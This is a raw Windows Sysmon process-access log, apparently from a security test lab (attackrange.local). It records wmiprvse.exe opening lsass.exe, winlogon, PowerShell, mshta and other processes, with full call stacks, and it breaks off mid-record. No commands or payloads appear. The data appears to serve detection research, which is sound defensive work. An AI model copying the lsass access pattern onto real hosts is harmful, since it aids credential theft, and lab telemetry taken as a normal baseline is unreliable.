15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program 